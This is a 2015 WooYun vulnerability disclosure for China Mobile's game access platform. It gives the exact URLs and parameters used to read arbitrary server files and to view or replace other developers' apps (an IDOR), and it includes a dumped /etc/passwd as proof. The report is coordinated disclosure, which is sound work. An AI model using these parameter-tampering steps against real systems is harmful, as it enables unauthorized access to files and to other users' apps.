当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115003

漏洞标题:中国移动和游戏接入平台越权查看/修改他人应用+任意文件读取

相关厂商:中国移动

漏洞作者: 超威蓝猫

提交时间:2015-05-19 22:56

修复时间:2015-07-07 16:02

公开时间:2015-07-07 16:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-23: 厂商已经确认,细节仅向厂商公开
2015-06-02: 细节向核心白帽子及相关领域专家公开
2015-06-12: 细节向普通白帽子公开
2015-06-22: 细节向实习白帽子公开
2015-07-07: 细节向公众公开

简要描述:

中国移动和游戏接入平台越权查看/修改他人应用+任意文件读取

详细说明:

平台地址:https://igop.cmgame.com:7443/cas/login
[任意文件读取]:登录后点击“游戏管理”-“游戏信息”,

sshot-2015-05-19-[1].png

上传图片后可以获得该链接:

http://igop.cmgame.com:38086/pop/content/createImage2page.action?localPath=/upload/20150515/131558/40947/icon/1431666936394.jpg


sshot-2015-05-19-[2].png


修改其中的文件地址,可读取任意文件。

sshot-2015-05-19-[3].png


sshot-2015-05-19-[4].png


[越权查看/修改他人应用]:我们先确认下当前帐号只有一个游戏:

sshot-2015-05-19-[12].png

登录后点击“我的待办”,点击“处理”按钮,得到如下链接:

http://igop.cmgame.com:38086/pop/content/modifyGameMyWork.action?contentInfo.contentId=40947&contentInfo.gameType=1


sshot-2015-05-19-[6].png


修改 contentInfo.contentId 即可查看/编辑他人应用。可替换apk文件、图标、截图、描述等内容。

sshot-2015-05-19-[7].png

由于js原因,在新标签页打开修改过的链接并不能进行上传apk或图片等操作,所以这里使用burp抓包修改id。

sshot-2015-05-19-[8].png

这里虽然还是显示当前帐号“上海纵游”,但下面的内容是属于修改过的ID的。

sshot-2015-05-19-[9].png


再随便查看几个

sshot-2015-05-19-[10].png

sshot-2015-05-19-[11].png

漏洞证明:

passwd: 

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/false
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
games:x:12:100:Games account:/var/games:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/false
news:x:9:13:News system:/etc/news:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
ntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/false
hacluster:x:90:90:heartbeat processes:/var/lib/heartbeat/cores/hacluster:/bin/false
gdm:x:50:106:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
suse-ncc:x:103:107:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/false
oracle:x:108:103::/opt/oracle:/bin/bash
patrol:x:891:890::/opt/bmc/:/bin/sh
sctmp:x:1002:100::/home/sctmp:/bin/bash
inspur:x:1006:100::/home/inspur:/usr/bin/csh
igop:x:1007:100::/home/igop:/bin/bash
igoptmp:x:1008:100::/home/igoptmp:/bin/bash
pop:x:1009:100::/home/mdsp/pop:/bin/bash
toptea:x:1010:2002::/home/toptea:/bin/csh
etlftp:x:1011:100::/home/etlftp:/bin/csh

修复方案:

:)

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-05-23 16:01

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理单位处置。按多个风险点评分,rank 16

最新状态:

暂无